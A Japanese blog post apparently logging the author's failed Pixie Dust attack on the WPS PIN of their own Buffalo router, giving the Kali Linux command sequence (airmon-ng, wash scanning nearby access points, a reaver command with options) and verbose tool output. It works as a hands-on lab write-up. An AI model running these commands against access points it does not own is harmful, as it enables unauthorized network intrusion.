Security
KaliLinux
wps

reaverでPixie Dust attackを試みたときのログ

More than 1 year has passed since last update.

注意点

攻撃は自分の所有している無線LAN親機に対してのみ行いましょう(念のため)

Pixie Dust attackとは

Ralink・Broadcom・Realtek各社の無線LANチップに実装上の手抜き(乱数ジェネレータのエントロピー不足)があるため、無線LAN親機のWPSのPINに対してオフライン攻撃できるというもの。2014年に指摘された。

reaverでPixie Dust attackしてみる

手元の無線LAN親機Buffalo WLAE-AG300Nに対してPixie Dust attackしてみた。攻撃環境は下記の通り。

  • ハードウェア: MacBook (Retina, 12-inch, Early 2016)
  • ホストOS: OS X El Capitan 10.11.6
  • 仮想化ソフトウェア: VirtualBox 5.1.22
  • ゲストOS: Kali Linux 2017.1
  • 無線LAN子機: Buffalo WLI-UC-AG300N

まずifconfigで無線子機のインターフェースを確認。

root@kali:~# ifconfig

(snip)

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 0a:09:da:**:**:**  txqueuelen 1000  (イーサネット)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

無線に関係するプロセスをkillする。dhclientを殺してしまうとDHCPでIPアドレスが取りなおせなくなってしまうので要注意。筆者はKali LinuxのIPアドレスを手動設定にしました(無線LANインターフェースでDHCPでIPアドレスを取っているのでなければ殺す必要はない気もする)。

root@kali:~# service network-manager stop
root@kali:~# airmon-ng check

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  639 wpa_supplicant
  642 dhclient

root@kali:~# airmon-ng check kill

Killing these processes:

  PID Name
  639 wpa_supplicant
  642 dhclient

モニターモードへ移行。

root@kali:~# airmon-ng start wlan0


PHY Interface   Driver      Chipset

phy0    wlan0       rt2800usb   BUFFALO INC. (formerly MelCo., Inc.) WLI-UC-AG300N Wireless LAN Adapter

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
        (mac80211 station mode vif disabled for [phy0]wlan0)

次にwashで攻撃対象の利用チャンネルとMACアドレスを確認。今回は攻撃対象が5GHz帯なので-5オプションをつける。

root@kali:~# wash -i wlan0mon -5

Wash v1.5.3 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
mod by t6_x<t6_x@hotmail.com>, DataHead, Soxrok2212, Wiire, AAnarchYY & rofl0r

BSSID              Ch  dBm  WPS  Lck  ESSID
--------------------------------------------------------------------------------
00:24:A5:**:**:**   1  -49  1.0  No   ****
00:1D:73:**:**:**   1  -94  1.0  No   ****
B0:C7:45:**:**:**   1  -45  1.0  No   ****
00:1D:73:**:**:**   1  -94  1.0  No   ****
48:E2:44:**:**:**   1  -94  1.0  No   ****
FC:4A:E9:**:**:**   1  -96  1.0  No   ****
BC:5C:4C:**:**:**  36  -86  1.0  No   ****
00:24:A5:**:**:**  40  -52  1.0  No   ****
4C:E6:76:**:**:**  44  -25  1.0  No   4CE676******

^C

ESSIDを元に自分所有の無線LAN親機を特定。受信信号強度が非常に良い状態(-25dBm)で実験している。

得た情報を元にreaverで攻撃してみる。オプションは色々試行錯誤中した結果なので善し悪しは不明。

root@kali:~# reaver -i wlan0mon -vvv -N -L -d 15 -T .5 -r 3:15 -w -K 1 -c 44 -b 4C:E6:76:**:**:**

Reaver v1.5.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft

[+] Switching wlan0mon to channel 44
[?] Restore previous session for 4C:E6:76:**:**:**? [n/Y] n
[+] Waiting for beacon from 4C:E6:76:**:**:**
[+] Associated with 4C:E6:76:**:**:** (ESSID: 4CE676******)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: dc:b0:94:83:f9:90:b1:e1:71:46:84:0e:8e:5b:97:5c
[P] PKE: 56:7a:d6:ac:da:4a:0f:75:60:21:dd:2e:e6:a2:68:36:5c:57:9d:c9:2c:fd:3f:a5:5f:6e:18:a5:35:44:7f:20:f9:c1:c0:82:21:80:9f:19:f5:ef:6a:17:d3:3a:df:4a:79:ae:31:e0:99:28:3f:79:82:f8:2c:49:36:2f:a7:ca:e9:86:9f:08:87:a1:2c:93:5f:3b:2a:3b:97:45:2f:2f:12:be:3b:a3:1a:23:f4:32:b9:13:0e:fa:0d:4f:8b:2e:32:f2:77:ba:6c:aa:5b:0f:b4:37:53:a5:31:32:4b:03:1c:41:7c:e5:08:ea:2c:fc:e7:62:6b:23:19:1f:f5:74:ea:2a:9c:32:ec:43:38:2b:b2:c9:87:e2:5f:d1:a8:ea:51:1f:74:bb:d9:24:20:76:b0:4a:0d:2a:2e:53:74:96:c6:77:b1:3a:6a:08:65:cb:3d:8d:1c:d9:1e:c1:57:0c:26:de:a4:cc:68:79:79:d0:b6:2f:e5:9a:df:a3:f5:10
[P] WPS Manufacturer: -
[P] WPS Model Name: WLAE-AG300N
[P] WPS Model Number: -
[P] Access Point Serial Number: -
[+] Received M1 message
[P] R-Nonce: 2d:35:19:7c:ce:39:4e:a6:55:1f:de:78:68:4b:4b:fd
[P] PKR: 96:50:7b:57:b7:18:86:f3:ee:ed:21:69:81:f5:46:cd:d9:05:58:ba:a2:ce:e5:25:1b:92:11:e8:66:fe:e7:15:e4:47:8f:c5:e2:f2:3b:6e:15:fe:68:d2:99:95:f3:c1:09:66:ff:ee:f5:62:bc:37:43:61:66:b5:4d:c0:ad:b3:09:9a:bb:75:ab:ec:f2:82:42:71:ab:bc:d9:1c:b1:33:c8:a5:61:39:f3:7a:aa:18:92:b6:46:1a:71:42:06:24:0a:99:33:3b:12:d6:8a:a8:41:be:23:f2:f4:a9:e9:64:f3:9a:f2:eb:35:63:17:d6:a4:bb:88:d5:58:ce:ea:8c:ce:bd:78:ab:b5:b5:a6:98:12:58:9a:36:8f:95:2d:52:ef:a6:6b:27:d1:99:fd:c3:79:60:81:7a:15:0c:6f:a0:37:bb:f0:2f:a7:6d:42:c7:de:f3:22:05:0d:73:e4:72:a9:96:96:8e:98:4b:6e:27:13:a1:45:17:b3:c0:9f:99
[P] AuthKey: a0:47:46:28:e7:19:a9:39:77:be:7a:bb:63:ae:86:41:de:81:31:06:bc:e9:7a:b6:8f:f1:49:96:8a:ae:30:a0
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 9e:28:c2:d6:88:25:e3:90:de:7b:0d:85:c4:dd:43:01
[P] PKE: 56:7a:d6:ac:da:4a:0f:75:60:21:dd:2e:e6:a2:68:36:5c:57:9d:c9:2c:fd:3f:a5:5f:6e:18:a5:35:44:7f:20:f9:c1:c0:82:21:80:9f:19:f5:ef:6a:17:d3:3a:df:4a:79:ae:31:e0:99:28:3f:79:82:f8:2c:49:36:2f:a7:ca:e9:86:9f:08:87:a1:2c:93:5f:3b:2a:3b:97:45:2f:2f:12:be:3b:a3:1a:23:f4:32:b9:13:0e:fa:0d:4f:8b:2e:32:f2:77:ba:6c:aa:5b:0f:b4:37:53:a5:31:32:4b:03:1c:41:7c:e5:08:ea:2c:fc:e7:62:6b:23:19:1f:f5:74:ea:2a:9c:32:ec:43:38:2b:b2:c9:87:e2:5f:d1:a8:ea:51:1f:74:bb:d9:24:20:76:b0:4a:0d:2a:2e:53:74:96:c6:77:b1:3a:6a:08:65:cb:3d:8d:1c:d9:1e:c1:57:0c:26:de:a4:cc:68:79:79:d0:b6:2f:e5:9a:df:a3:f5:10
[P] WPS Manufacturer: -
[P] WPS Model Name: WLAE-AG300N
[P] WPS Model Number: -
[P] Access Point Serial Number: -
[+] Received M1 message
[P] R-Nonce: 14:13:b5:08:da:74:b7:12:33:11:f5:21:53:bf:9f:58
[P] PKR: 45:03:f5:94:a9:c7:4d:3c:93:d8:13:73:ae:b9:36:30:91:d6:70:6b:c5:53:e5:58:22:3f:01:eb:a8:a5:41:6a:2f:a1:76:13:40:f6:9e:f0:0c:38:a2:81:36:ab:b9:59:8c:b5:82:ea:5b:df:35:c9:58:7c:e4:4b:16:47:00:a2:3e:58:ee:1c:21:83:32:f7:5c:a9:fa:16:29:4b:9b:e3:4a:c4:39:37:8f:dc:99:05:c1:72:5d:aa:77:9e:dd:5b:3b:04:21:c6:48:3a:18:35:af:b4:ae:c9:ce:6b:44:9a:93:eb:ca:87:6b:bf:d0:dc:18:4f:a8:c0:4f:71:68:42:42:3e:45:fe:b6:d3:c4:8e:31:e5:eb:eb:de:8f:6f:60:24:8f:02:6c:51:38:34:33:5d:4c:bc:48:c9:05:69:15:d9:84:92:34:d0:35:01:93:1b:80:03:98:9a:41:a6:7f:c5:c0:f0:0f:44:6b:13:bc:ba:d9:a7:0f:a8:0a:2e:93
[P] AuthKey: 43:de:5f:42:f9:fc:a6:16:57:93:d3:82:03:ac:42:98:b0:66:15:1d:3b:a5:e9:f5:35:f6:4e:2e:af:ef:4d:d2
[+] Sending M2 message
[P] E-Hash1: 05:29:75:d5:09:8e:7e:30:a1:35:fa:fc:0d:46:11:a0:20:6e:16:94:8a:a9:2a:5c:71:27:81:b4:94:89:46:a2
[P] E-Hash2: 21:aa:6f:3f:9b:20:96:1b:0b:a1:dc:c5:ee:9d:ab:75:83:6a:94:cf:5a:43:e2:49:a7:a0:18:31:c3:74:55:b9
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]
[Pixie-Dust]   Pixiewps 1.2
[Pixie-Dust]
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust]   [*] Time taken: 0 s 162 ms
[Pixie-Dust]
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]
[Pixie-Dust]   Pixiewps 1.2
[Pixie-Dust]
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]

Pixie Dust attackでPINが見つからずにreaverが終了した。この機種はAtheros社製チップを使っており、Pixie Dust attackが成立しないのは想定通り。

以前は下記のエラーが出まくっていたが、無線関連のプロセスをkillしたところ出なくなった。

[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred